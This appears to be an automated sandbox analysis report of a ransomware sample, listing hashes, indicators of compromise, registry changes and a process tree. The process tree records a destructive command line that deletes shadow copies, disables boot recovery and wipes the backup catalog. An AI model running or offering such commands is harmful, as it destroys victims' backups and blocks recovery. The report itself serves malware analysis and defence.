Analysis
max time kernel: 131s
max time network: 143s
platform: windows10-2004_x64
resource: win10v2004-20250502-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250502-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19/05/2025, 14:51
Static task: static1
Behavioral task: behavioral1
Sample: 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
Resource: win10v2004-20250502-en
Behavioral task: behavioral2
Sample: 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
Resource: win11-20250502-en
General
Target: 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
Size: 197KB
MD5: b35a7c0c23349c34d7eaa11be87681b3
SHA1: 265a3a1b889a9f3f5bb53f9e5d1cbc7f48d24fe8
SHA256: c032b020f742add231aa1b02c90240cc702d81ccd255c015284c1389ef1e7b6c
SHA512: 67a8c9eb39da8f24a48acee027706052d68b59cbad05e9028bafb70ba77a562c8ae1b72c375bcd03ea1846775c577bff005ed148ba8dd0963673c91144846dd2
SSDEEP: 3072:zQ7pevne/DLB5w20WLjF72xnEt44etrlV9Yl4cqnj:zQ7peve/DLB56gF72CW4etrlV9m4
Malware Config
Signatures

Deletes shadow copies (3 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Renames multiple (67) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.

Drops file in Drivers directory (2 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\System32\drivers\etc\hosts | discord.exe
File opened for modification | C:\Windows\System32\drivers\etc\hosts | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\International\Geo\Nation | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\International\Geo\Nation | discord.exe

Executes dropped EXE (1 IoC)
pid | Process
1148 | discord.exe

Adds Run key to start application (2 TTPs, 2 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\AppData\\Local\\discord.exe" | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\AppData\\Local\\discord.exe" | discord.exe

Drops desktop.ini file(s) (20 IoCs)
description | ioc | Process
File created | C:\Users\Admin\Music\desktop.ini | discord.exe
File created | C:\Users\Admin\OneDrive\desktop.ini | discord.exe
File created | C:\Users\Admin\3D Objects\desktop.ini | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
File created | C:\Users\Admin\Desktop\desktop.ini | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
File created | C:\Users\Admin\Desktop\desktop.ini | discord.exe
File created | C:\Users\Admin\Downloads\desktop.ini | discord.exe
File created | C:\Users\Admin\Pictures\desktop.ini | discord.exe
File created | C:\Users\Admin\Pictures\desktop.ini | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
File created | C:\Users\Admin\Pictures\Camera Roll\desktop.ini | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
File created | C:\Users\Admin\OneDrive\desktop.ini | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
File created | C:\Users\Admin\Documents\desktop.ini | discord.exe
File created | C:\Users\Admin\Pictures\Camera Roll\desktop.ini | discord.exe
File created | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
File created | C:\Users\Admin\Music\desktop.ini | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
File created | C:\Users\Admin\Videos\desktop.ini | discord.exe
File created | C:\Users\Admin\Videos\desktop.ini | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
File created | C:\Users\Admin\3D Objects\desktop.ini | discord.exe
File created | C:\Users\Admin\Downloads\desktop.ini | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
File created | C:\Users\Admin\Documents\desktop.ini | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
File created | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | discord.exe

Drops file in System32 directory (1 IoC)
description | ioc | Process
File created | C:\Windows\SysWOW64\Ñ:\APEXGO.exe.exe | cmd.exe

Sets desktop wallpaper using registry (2 TTPs, 2 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Pictures\\imagexSIxnnbNiOVYwyIIHwotgPgRNKhzjW.jpg" | discord.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Pictures\\imageJYnansNC=fMcPGKpJKetnruH=HVMRU.jpg" | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 10 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | NOTEPAD.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | NOTEPAD.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WMIC.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WMIC.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | discord.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe

Modifies registry class (2 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000_Classes\Local Settings | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
Key created | \REGISTRY\USER\S-1-5-21-3674642747-2260306818-3009887879-1000_Classes\Local Settings | discord.exe

NTFS ADS (1 IoC)
description | ioc | Process
File created | C:\Users\Admin\AppData\Local\Temp\Ñ:\APEXGO.exe.exe | cmd.exe

Opens file in notepad (likely ransom note) (2 IoCs)
pid | Process
3292 | NOTEPAD.EXE
4376 | NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses (1 IoC)
pid | Process
1148 | discord.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 4160 | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
Token: SeDebugPrivilege | 1148 | discord.exe
Token: SeIncreaseQuotaPrivilege | 4644 | WMIC.exe
Token: SeSecurityPrivilege | 4644 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 4644 | WMIC.exe
Token: SeLoadDriverPrivilege | 4644 | WMIC.exe
Token: SeSystemProfilePrivilege | 4644 | WMIC.exe
Token: SeSystemtimePrivilege | 4644 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 4644 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 4644 | WMIC.exe
Token: SeCreatePagefilePrivilege | 4644 | WMIC.exe
Token: SeBackupPrivilege | 4644 | WMIC.exe
Token: SeRestorePrivilege | 4644 | WMIC.exe
Token: SeShutdownPrivilege | 4644 | WMIC.exe
Token: SeDebugPrivilege | 4644 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 4644 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 4644 | WMIC.exe
Token: SeUndockPrivilege | 4644 | WMIC.exe
Token: SeManageVolumePrivilege | 4644 | WMIC.exe
Token: 33 | 4644 | WMIC.exe
Token: 34 | 4644 | WMIC.exe
Token: 35 | 4644 | WMIC.exe
Token: 36 | 4644 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 4212 | WMIC.exe
Token: SeSecurityPrivilege | 4212 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 4212 | WMIC.exe
Token: SeLoadDriverPrivilege | 4212 | WMIC.exe
Token: SeSystemProfilePrivilege | 4212 | WMIC.exe
Token: SeSystemtimePrivilege | 4212 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 4212 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 4212 | WMIC.exe
Token: SeCreatePagefilePrivilege | 4212 | WMIC.exe
Token: SeBackupPrivilege | 4212 | WMIC.exe
Token: SeRestorePrivilege | 4212 | WMIC.exe
Token: SeShutdownPrivilege | 4212 | WMIC.exe
Token: SeDebugPrivilege | 4212 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 4212 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 4212 | WMIC.exe
Token: SeUndockPrivilege | 4212 | WMIC.exe
Token: SeManageVolumePrivilege | 4212 | WMIC.exe
Token: 33 | 4212 | WMIC.exe
Token: 34 | 4212 | WMIC.exe
Token: 35 | 4212 | WMIC.exe
Token: 36 | 4212 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 4212 | WMIC.exe
Token: SeSecurityPrivilege | 4212 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 4212 | WMIC.exe
Token: SeLoadDriverPrivilege | 4212 | WMIC.exe
Token: SeSystemProfilePrivilege | 4212 | WMIC.exe
Token: SeSystemtimePrivilege | 4212 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 4212 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 4212 | WMIC.exe
Token: SeCreatePagefilePrivilege | 4212 | WMIC.exe
Token: SeBackupPrivilege | 4212 | WMIC.exe
Token: SeRestorePrivilege | 4212 | WMIC.exe
Token: SeShutdownPrivilege | 4212 | WMIC.exe
Token: SeDebugPrivilege | 4212 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 4212 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 4212 | WMIC.exe
Token: SeUndockPrivilege | 4212 | WMIC.exe
Token: SeManageVolumePrivilege | 4212 | WMIC.exe
Token: 33 | 4212 | WMIC.exe
Token: 34 | 4212 | WMIC.exe
Token: 35 | 4212 | WMIC.exe

Suspicious use of FindShellTrayWindow (2 IoCs)
pid | Process
4160 | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
1148 | discord.exe

Suspicious use of SendNotifyMessage (2 IoCs)
pid | Process
4160 | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
1148 | discord.exe

Suspicious use of WriteProcessMemory (27 IoCs)
description | pid | Process | procid_target
PID 1712 wrote to memory of 1148 | 1712 | cmd.exe | 93
PID 1712 wrote to memory of 1148 | 1712 | cmd.exe | 93
PID 1712 wrote to memory of 1148 | 1712 | cmd.exe | 93
PID 1148 wrote to memory of 3292 | 1148 | discord.exe | 96
PID 1148 wrote to memory of 3292 | 1148 | discord.exe | 96
PID 1148 wrote to memory of 3292 | 1148 | discord.exe | 96
PID 4160 wrote to memory of 4376 | 4160 | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe | 97
PID 4160 wrote to memory of 4376 | 4160 | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe | 97
PID 4160 wrote to memory of 4376 | 4160 | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe | 97
PID 4160 wrote to memory of 956 | 4160 | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe | 98
PID 4160 wrote to memory of 956 | 4160 | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe | 98
PID 4160 wrote to memory of 956 | 4160 | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe | 98
PID 1148 wrote to memory of 4372 | 1148 | discord.exe | 100
PID 1148 wrote to memory of 4372 | 1148 | discord.exe | 100
PID 1148 wrote to memory of 4372 | 1148 | discord.exe | 100
PID 4160 wrote to memory of 3080 | 4160 | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe | 102
PID 4160 wrote to memory of 3080 | 4160 | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe | 102
PID 4160 wrote to memory of 3080 | 4160 | 2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe | 102
PID 1148 wrote to memory of 5032 | 1148 | discord.exe | 103
PID 1148 wrote to memory of 5032 | 1148 | discord.exe | 103
PID 1148 wrote to memory of 5032 | 1148 | discord.exe | 103
PID 956 wrote to memory of 4644 | 956 | cmd.exe | 106
PID 956 wrote to memory of 4644 | 956 | cmd.exe | 106
PID 956 wrote to memory of 4644 | 956 | cmd.exe | 106
PID 4372 wrote to memory of 4212 | 4372 | cmd.exe | 107
PID 4372 wrote to memory of 4212 | 4372 | cmd.exe | 107
PID 4372 wrote to memory of 4212 | 4372 | cmd.exe | 107

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes (process-tree depth in brackets)

[1] C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe"
    PID: 4160
    - Drops file in Drivers directory
    - Checks computer location settings
    - Adds Run key to start application
    - Drops desktop.ini file(s)
    - Sets desktop wallpaper using registry
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\SysWOW64\NOTEPAD.EXE
      Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\APEXNOTE.txt
      PID: 4376
      - System Location Discovery: System Language Discovery
      - Opens file in notepad (likely ransom note)

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
      PID: 956
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\Wbem\WMIC.exe
        Command line: wmic shadowcopy delete
        PID: 4644
        - System Location Discovery: System Language Discovery
        - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\usb_maker.bat" "
      PID: 3080
      - System Location Discovery: System Language Discovery
      - NTFS ADS

[1] C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\discord.exe
    PID: 1712
    - Suspicious use of WriteProcessMemory

  [2] C:\Users\Admin\AppData\Local\discord.exe
      Command line: C:\Users\Admin\AppData\Local\discord.exe
      PID: 1148
      - Drops file in Drivers directory
      - Checks computer location settings
      - Executes dropped EXE
      - Adds Run key to start application
      - Drops desktop.ini file(s)
      - Sets desktop wallpaper using registry
      - System Location Discovery: System Language Discovery
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\NOTEPAD.EXE
        Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\APEXNOTE.txt
        PID: 3292
        - System Location Discovery: System Language Discovery
        - Opens file in notepad (likely ransom note)

    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        PID: 4372
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\Wbem\WMIC.exe
          Command line: wmic shadowcopy delete
          PID: 4212
          - System Location Discovery: System Language Discovery
          - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\usb_maker.bat" "
        PID: 5032
        - Drops file in System32 directory
        - System Location Discovery: System Language Discovery

[1] C:\Windows\system32\vssvc.exe
    Command line: C:\Windows\system32\vssvc.exe
    PID: 3568
Network
MITRE ATT&CK Enterprise v16
Downloads

Filesize: 197KB
MD5: b35a7c0c23349c34d7eaa11be87681b3
SHA1: 265a3a1b889a9f3f5bb53f9e5d1cbc7f48d24fe8
SHA256: c032b020f742add231aa1b02c90240cc702d81ccd255c015284c1389ef1e7b6c
SHA512: 67a8c9eb39da8f24a48acee027706052d68b59cbad05e9028bafb70ba77a562c8ae1b72c375bcd03ea1846775c577bff005ed148ba8dd0963673c91144846dd2

Filesize: 40B
MD5: ff1447561eae283bddeb71e3ea3168cb
SHA1: 3399abb7e65489ccddc2118079c1ec2ce2f5404f
SHA256: 915cd36509e6360c2e35301430765ddc70a37057109c4806c7837452431d8b02
SHA512: 7e50186680e387a137c67f247201afe5809891050784a15ca510435e40947de6f3efb07db5e921bfda94a3e26927b2b833cdf4d1b66a3d7400d7fe3453aa7bad

Filesize: 24KB
MD5: 25342190bcc364d32b9e9f9928b5a8a5
SHA1: 3ae3bdabaed70dba1fd96c0be72e17aa91c7802a
SHA256: d626e482d44f5fc8eb1c9b2cd08070150ab99afe40cf6dc939015b01b09088f4
SHA512: c0f4f1831f289d4d60e9323e36689c2e0aaa9a7de3dbe4e65b2974d26d3f6f480a7160f5eff2ad458f8b0a7f36057bfba9c7a1b62769091b02640176bd2e53c3

Filesize: 1KB
MD5: 2e8e30afd640ba60cee4644e27efecf2
SHA1: 31f6a7727c6b40419715b769d6a60b3872868b5b
SHA256: 034c79570dc0d54160ed0d3b4435bf4fdcae10a0d2ab688348f112f399d6ea14
SHA512: 052401dbc296664301a8b0522296c3af22ddc1b36d3e782bcda2709b20aa47085cdf080bb536c34533c1d595768e21035112060f3672e3b82d5e23001c41f76b

Filesize: 800B
MD5: bdba72b1177bdfc5dee1d9941fdcae45
SHA1: a7713959c8f0a6d8d7a6169665e87b009ac04b10
SHA256: dd1e78ae51782f025cad303019e331c493d20bc0f7f71c0c186a85be24ee13be
SHA512: 3eca03cd090b483beb4e2009a535905ce6ac8100782f46dd681db1e2e25960cd854d303f2820225581b6e25a89925f0199fa022887a5c3c59f53297eb0884b5a

Filesize: 95KB
MD5: 23dcba6ae05640c3c9c1621cd9f4cd7f
SHA1: 0b6ecd44bac5a58ba27dfdb26d9a8759723f1e3f
SHA256: f7fc0500d8f3b0596e080a801561a86ce76670e85461c9a56537a011dbd595b0
SHA512: 11ac6c8fc9c45043757b7e0c2c9704c5ef75bd7b80794dbf0eea0a3c0d672164feb6e56d5685e4b8ef7c629394526794a9f32e0d093c6ffbfd7e3520002da18b

Filesize: 3KB
MD5: de941294418545204a4ec21837641098
SHA1: 5b6c90046d37841e0096b1f85d021836f2b09639
SHA256: 1d7320e6895f426fe4f7bf535b0a63e8308202a6d1a7b790498c45ad5fc58cea
SHA512: fcecb0fee780eda474576afb6fa799fadb5a82d1eb725f93bdcdc4bd7617361f254d03510cbb7f50b1f056e15dd51f56d4a5027e21b4d6289a5e283e0a6b0daf